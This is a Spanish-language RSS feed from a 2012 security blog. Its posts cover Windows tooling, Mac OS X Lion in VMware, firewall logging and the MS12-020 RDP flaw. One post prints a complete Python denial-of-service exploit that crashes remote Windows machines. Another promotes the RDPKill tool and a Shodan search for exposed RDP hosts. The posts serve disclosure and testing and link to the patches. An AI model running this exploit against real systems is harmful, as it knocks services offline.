<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Caminando entre bits... &#187; windows</title>
	<atom:link href="http://seifreed.com/tag/windows/feed/" rel="self" type="application/rss+xml" />
	<link>http://seifreed.com</link>
	<description></description>
	<lastBuildDate>Wed, 30 May 2012 11:00:03 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='seifreed.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Caminando entre bits... &#187; windows</title>
		<link>http://seifreed.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://seifreed.com/osd.xml" title="Caminando entre bits..." />
	<atom:link rel='hub' href='http://seifreed.com/?pushpress=hub'/>
		<item>
		<title>Adaptando Windows para trabajar</title>
		<link>http://seifreed.com/2012/04/18/adaptando-windows-para-trabajar/</link>
		<comments>http://seifreed.com/2012/04/18/adaptando-windows-para-trabajar/#comments</comments>
		<pubDate>Wed, 18 Apr 2012 21:57:23 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[herramientas]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4188</guid>
		<description><![CDATA[No sabía muy bien que nombre ponerle a esta entrada ya que trata un poco de algo personal que me encuentro a la hora de trabajar con sistemas Microsoft Windows. Si te dedicas ha hacer algo de análisis de logs por ejemplo y quieres parsear ficheros es muy rápido hacerlo con grep, awk, cut etc.. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4188&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>No sabía muy bien que nombre ponerle a esta entrada ya que trata un poco de algo personal que me encuentro a la hora de trabajar con sistemas Microsoft Windows. Si te dedicas ha hacer algo de análisis de logs por ejemplo y quieres parsear ficheros es muy rápido hacerlo con grep, awk, cut etc.. Este tipo de herramientas vienen ya en sistemas GNU-Linux y *nix.</p>
<p><img class="alignleft" src="http://optimustechpr.com/wp-content/uploads/2010/12/Computer-Logo-Specialist.jpg" alt="" width="402" height="290" />Para hacerlo desde el CMD de Windows, podemos por ejemplo utilizar el paquete <a href="http://sourceforge.net/projects/unxutils/">Unix Utils</a> este paqute lo copiamos en C:\Windows\System32, así que podemos hacer la llamada desde el cmd de Windows, ya tenemos algo muy potente que usamos en GNU-Linux adaptado a Windows.</p>
<p>También tenemos las utilidades de <a href="http://www.nirsoft.net/">Nirsoft</a> y las de <a href="http://technet.microsoft.com/es-es/sysinternals">Sysinternals</a>, estas utilidades nos brindan una administración para casi cualquier cosa, además de utilidades aparte. Para mantener estas utilidades actualizadas al día, podemos usar por ejemplo Windows System Control Center, este software nos bajará ya demás nos actualizará las versiones que tengamos bajadas, de manera que siempre tendremos las herramientas actualizadas.</p>
<p>Si nuestro sistema es 64 bits, nos bajará las utilidades de 64 bits por lo que podremos incluso trabajar con la versión adecuada a nuestro sistema.</p>
<p>Otras de las herramientas que también uso mucho es sincronizar herramientas por SVN, como cliente para Windows estoy enamorado de <a href="http://tortoisesvn.net/">TortoiseSVN</a>, lo uso para sincronizar herramientas alojadas en Code Google por ejemplo <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Si quiero seguridad en mis datos puedo usar por ejemplo <a href="http://windows.microsoft.com/es-ES/windows7/products/features/bitlocker">Bitlocker</a> para Windows, eso me proporciona difrado en partición o en discos duros externos, como USB.</p>
<p>Para ejecutar archivos .pl de perl y .py de python, además de poder usarlo desde la consola de Windows uso <a href="http://www.activestate.com/activeperl">Active Perl</a> y <a href="http://www.activestate.com/activepython">Active Python</a>, muy útil, la verdad.</p>
<p>Estos son algunas de las utilidades que utilizo cuando me instalo un sistema Windows.</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/personal/'>Personal</a> Tagged: <a href='http://seifreed.com/tag/herramientas/'>herramientas</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4188/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4188/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4188/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4188&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/04/18/adaptando-windows-para-trabajar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://optimustechpr.com/wp-content/uploads/2010/12/Computer-Logo-Specialist.jpg" medium="image" />
	</item>
		<item>
		<title>MAC OS X Lion en VMWare 8</title>
		<link>http://seifreed.com/2012/04/02/mac-os-x-lion-en-vmware-8/</link>
		<comments>http://seifreed.com/2012/04/02/mac-os-x-lion-en-vmware-8/#comments</comments>
		<pubDate>Mon, 02 Apr 2012 20:51:11 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[MAC OS X]]></category>
		<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[mac os x lion]]></category>
		<category><![CDATA[virtual]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4154</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! En el pequeño laboratorio que me estoy montando quería también incluir a MAC OS X Lion para poder hacer las auditorías, temas de malware etc&#8230; Hay bastantes tutoriales de como añadir MAC OS X en VMWare 8, pero todo son problemas&#8230; Así que expondré los pasos seguidos para poder tener [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4154&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>En el pequeño laboratorio que me estoy montando quería también incluir a MAC OS X Lion para poder hacer las auditorías, temas de malware etc&#8230;</p>
<p>Hay bastantes tutoriales de como añadir MAC OS X en VMWare 8, pero todo son problemas&#8230;</p>
<p>Así que expondré los pasos seguidos para poder tener la última versión de MAC OS X Lion y además que se pueda actualizar a la última versión, totalmente funcional.</p>
<p>Como requisitos:</p>
<ul>
<li>Última <a href="http://downloads.vmware.com/d/info/desktop_end_user_computing/vmware_workstation/8_0">versión de VMWare</a></li>
<li><a href="http://www.mediafire.com/?b171ssg801678j1">Unlocker para VMWare</a></li>
<li><a href="http://www.mediafire.com/?ku6rgna5az8czwy">VMWare tools para MAC</a></li>
<li><a href="https://www.google.es/#hl=es&amp;output=search&amp;sclient=psy-ab&amp;q=Mac+OS+X+Lion+bootable+vmdk&amp;oq=Mac+OS+X+Lion+bootable+vmdk&amp;aq=f&amp;aqi=g2&amp;aql=&amp;gs_l=hp.3..0l2.1286l1286l0l1626l1l1l0l0l0l0l152l152l0j1l1l0.frgbld.&amp;pbx=1&amp;bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&amp;fp=9b20cc8a55c6da89&amp;biw=1366&amp;bih=651">VMDK para hacer la instalación, lo encontraremos por Google</a></li>
<li><a href="http://en.sourceforge.jp/projects/sfnet_vmsvga2/downloads/Audio/EnsoniqAudioPCI_v1.0.3_Lion.pkg/">Sonido para el Lion</a></li>
</ul>
<p>Los pasos a seguir es que, con el Unlocker aplicaremos un parche a VMWare para poder instalar y configurar MAC OS X Lion en VMWare 8.</p>
<p>Aplicamos el parche</p>
<p><img class="aligncenter" src="http://www.windows7hacker.com/wp-content/uploads/2011/09/run_windows.bat_.png" alt="" width="570" height="480" /></p>
<p>Después de aplicar el parche, creamos la máquina virtual y en el momento de elegir el disco, escogemos el VMDK que nos hemos descargado préviamente.</p>
<p><img class="aligncenter" src="http://www.windows7hacker.com/wp-content/uploads/2011/09/use_an_exisiting_virutal_disk.png" alt="" width="432" height="375" /></p>
<p>Una vez cargado el VMDK, solo tendremos que iniciar la máquina virtual y instalar Lion. Una vez instalado, instalamos la VMWare tools descargadas antes.</p>
<p><img class="aligncenter" src="http://www.windows7hacker.com/wp-content/uploads/2011/09/install_VMware_tools.png" alt="" width="639" height="480" /></p>
<p>Con las VMWare tools conseguiremos mejor resolución de pantalla, además de las carpetas compartidas con la máquina host.</p>
<p>Por último añadiremos los drivers de audio descargados en la parte de requisitos, lo instalaremos y actualizaremos el sistema.</p>
<p>Como resultado tendremos la última versión de Lion funcionando perfectamente!</p>
<p>Saludos cordiales</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/sistemas-operativos/mac-os-x/'>MAC OS X</a>, <a href='http://seifreed.com/category/sistemas-operativos/'>Sistemas Operativos</a>, <a href='http://seifreed.com/category/sistemas-operativos/windows-sistemas-operativos/'>Windows</a> Tagged: <a href='http://seifreed.com/tag/mac/'>mac</a>, <a href='http://seifreed.com/tag/mac-os-x-lion/'>mac os x lion</a>, <a href='http://seifreed.com/tag/virtual/'>virtual</a>, <a href='http://seifreed.com/tag/vmware/'>VMware</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4154/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4154/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4154&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/04/02/mac-os-x-lion-en-vmware-8/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://www.windows7hacker.com/wp-content/uploads/2011/09/run_windows.bat_.png" medium="image" />

		<media:content url="http://www.windows7hacker.com/wp-content/uploads/2011/09/use_an_exisiting_virutal_disk.png" medium="image" />

		<media:content url="http://www.windows7hacker.com/wp-content/uploads/2011/09/install_VMware_tools.png" medium="image" />
	</item>
		<item>
		<title>Mas formas de explotar la vulnerabilidad de escritorio remoto MS12-020</title>
		<link>http://seifreed.com/2012/03/29/mas-formas-de-explotar-la-vulnerabilidad-de-escritorio-remoto-ms12-020/</link>
		<comments>http://seifreed.com/2012/03/29/mas-formas-de-explotar-la-vulnerabilidad-de-escritorio-remoto-ms12-020/#comments</comments>
		<pubDate>Thu, 29 Mar 2012 13:55:15 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MS12-020]]></category>
		<category><![CDATA[rdp]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4151</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Hace unos días estuve hablando de la vulnerabilidad de escritorio remoto. En la entrada exponía un script en Python para causar la denegación de servicio. Ahora Mark dePalma ha sacado una herramienta que se llama RDPKill que explota la vulnerabilidad de Escritorio Remoto. Hay que elegir el target y el [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4151&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Hace unos días <a href="http://seifreed.com/2012/03/17/exploit-para-la-vulnerabilidad-en-rdp-de-microsoft-ms12-020/">estuve hablando de la vulnerabilidad de escritorio remoto</a>.</p>
<p>En la entrada exponía un script en Python para causar la denegación de servicio.</p>
<p>Ahora Mark dePalma ha sacado una herramienta que se llama RDPKill que explota la vulnerabilidad de Escritorio Remoto.</p>
<p><img class="aligncenter" src="http://www.f-secure.com/weblog/archives/rdpkill_screenshot1.png" alt="" width="350" height="175" /></p>
<p>Hay que elegir el target y el puerto remoto y dale a Kill sencillo no? <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Podemos ver el uso&#8230;</p>
<p><img class="aligncenter" src="http://www.f-secure.com/weblog/archives/rdpkill_screenshot1.png" alt="" width="350" height="175" /></p>
<p>La herramienta acaba causando un BSOD en el equipo remoto.</p>
<p>Por otro lado tenemos otra página web. que se llama RDPCheck!</p>
<p>Esta web coge nuestra IP Pública y metiendo el correo comprueba si nuestro RDP es vulnerable o no, podemos acceder aquí</p>
<p><a href="http://rdpcheck.com/">RDPcheck</a></p>
<p>Nos envía un reporte a nuestro correo <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Y no olvidéis que, mediante Shodan, se pueden encontrar hosts que usen RDP <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p><a href="http://www.shodanhq.com/search?q=port%3A3389">Búsqueda de Shodan</a></p>
<p>Hasta aquí el artículo de hoy!</p>
<p>Saludos</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/exploit/'>exploit</a>, <a href='http://seifreed.com/tag/microsoft/'>Microsoft</a>, <a href='http://seifreed.com/tag/ms12-020/'>MS12-020</a>, <a href='http://seifreed.com/tag/rdp/'>rdp</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4151&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/03/29/mas-formas-de-explotar-la-vulnerabilidad-de-escritorio-remoto-ms12-020/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://www.f-secure.com/weblog/archives/rdpkill_screenshot1.png" medium="image" />

		<media:content url="http://www.f-secure.com/weblog/archives/rdpkill_screenshot1.png" medium="image" />
	</item>
		<item>
		<title>Exploit para la vulnerabilidad en RDP de Microsoft (MS12-020)</title>
		<link>http://seifreed.com/2012/03/17/exploit-para-la-vulnerabilidad-en-rdp-de-microsoft-ms12-020/</link>
		<comments>http://seifreed.com/2012/03/17/exploit-para-la-vulnerabilidad-en-rdp-de-microsoft-ms12-020/#comments</comments>
		<pubDate>Sat, 17 Mar 2012 07:00:15 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[rdp]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4114</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Hace unos días salió la noticia de un fallo en el RDP de Microsoft. Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP que habían sido puestos en su conocimiento a través de fuentes privadas. Ya hay varios Pastebin con el [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4114&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Hace unos días salió la noticia de un fallo en el RDP de Microsoft.</p>
<p>Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP que habían sido puestos en su conocimiento a través de fuentes privadas.</p>
<p>Ya hay varios Pastebin con el código explotable para la vulnerabiliad, podemos ver el <a href="http://technet.microsoft.com/es-es/security/bulletin/ms12-020">resumen de la vulnerabilidad aquí.</a></p>
<p>De los múltiples exploits que me he encontrado he hecho la prueba con uno de ellos.</p>
<p>Lo he probado contra una máquina Windows XP SP3</p>
<p>El código del exploit:</p>
<blockquote><p># ms12-020 smaller<br />
# I reduced the needed payload to DOS, the crashed is caused by buf2<br />
# bp RDPWD!NM_Disconnect // crash is after this<br />
#<br />
# freenode #ms12-020</p>
<p>import socket<br />
import sys<br />
import time</p>
<p>#init<br />
buf0 = &#8220;030000130ee000000000000100080000000000&#8243;.decode(&#8216;hex&#8217;)<br />
#MCS: Connection-initial<br />
buf1 = &#8220;030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0&#8243;.decode(&#8216;hex&#8217;)<br />
#payload<br />
buf2 = &#8220;0300000802f08028&#8243;.decode(&#8216;hex&#8217;)</p>
<p>package = buf0+buf1+buf2</p>
<p>HOST = sys.argv[1]<br />
PORT = 3389<br />
for i in range(10000):<br />
print i<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.settimeout(3)<br />
s.connect((HOST,PORT))<br />
try:<br />
s.send(package)<br />
rec = s.recv(1024)<br />
except:<br />
pass<br />
s.close()</p></blockquote>
<p>Al ejecutarlo la máquina Windows remota se reinicia.</p>
<p>En el enlace anterior sobre la información de la vulnerabilidad podréis encontrar los parches correspondientes.</p>
<p>Saludos!</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/hacking-seguridad/'>Hacking</a>, <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/exploit/'>exploit</a>, <a href='http://seifreed.com/tag/rdp/'>rdp</a>, <a href='http://seifreed.com/tag/windows/'>windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4114/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4114&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/03/17/exploit-para-la-vulnerabilidad-en-rdp-de-microsoft-ms12-020/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Firewall Windows 7 y Cygwin</title>
		<link>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/</link>
		<comments>http://seifreed.com/2012/01/13/firewall-windows-7-y-cygwin/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 18:29:27 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Console2]]></category>
		<category><![CDATA[Cygwin]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4031</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete: Allow: El paquete mediante una regla preestablecida [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=4031&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>En mis andaduras de configurción del Firewall de Windows 7, me encontraba con el problema de que a veces no sabía si un paquete estaba recibiendo un DROP un allow. Los firewalls en general conocen 3 estados para la decisión con un paquete:</p>
<p><strong>Allow:</strong> El paquete mediante una regla preestablecida deja pasar hacia fuera</p>
<p><strong>Drop</strong>:Se deniega el paso del paquete y no manda respuesta de ello</p>
<p><strong>Reject</strong>:Se deniega el paso de ese paquete, manda un ICMP como destino inalcanzable</p>
<p>El log de Firewall de Wndows 7 es bastante sencillo de interpretar, así que mientras hacía mis pruebas y al mas estilo Unix, con Cygwin me hice un sh para ir comprobando los paquetes. Para activar el LOG en Firewall hemos de ir a la utilidad wf.msc con permisos de administrador.</p>
<p><img class="aligncenter" src="http://img339.imageshack.us/img339/9411/firewallgeneral.png" alt="" width="601" height="467" /></p>
<p>Si obervamos la imagen tenemos que ir al menú de Propiedades de Firewall</p>
<p><img class="aligncenter" src="http://img839.imageshack.us/img839/8476/iniciogk.png" alt="" width="415" height="458" /></p>
<p>Aqui tenemos los 3 perfiles del firewall, cada perfil se establece en un área de red que heos definido cuando nos conectamos a una red. En el caso de dominio normalmente  si trabajas en dominio en una empresa, privado en casa, por ejemplo y público en todo aquel sitio que no conozcas ni sea de tu confianza.</p>
<p>Aunque puede que cada pefil debería d estar configurado de una manera especial, creo que es bueno configurar el Firewall lo mas restringivo posible en todas las áreas, siendo así una medida de mitigación contra posibles ataques del exterior.</p>
<p>En el apartado de inicio de sesión:</p>
<p><img class="aligncenter" src="http://img18.imageshack.us/img18/5149/saveh.png" alt="" width="413" height="459" /></p>
<p>Para cada uno de estos dominios, hemos de activar que registre los paquetes descartados y correctos. El log se guarda por defecto en:</p>
<blockquote><p>/Windows/System32/LogFiles/Firewall/pfirewall.log</p></blockquote>
<p>Como trabajo mucho con Cygwin, con un simple tail, podríamos ir viendo como se van registrando los paquetes:</p>
<blockquote><p>#!/bin/bash</p>
<p>#Shell que hace un tail de las conexiones del Firewall</p>
<p>tail -f /cygdrive/c/Windows/System32/LogFiles/Firewall/pfirewall.log</p></blockquote>
<p>Una utilidad mas por si hay alguien que queire probarlo <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
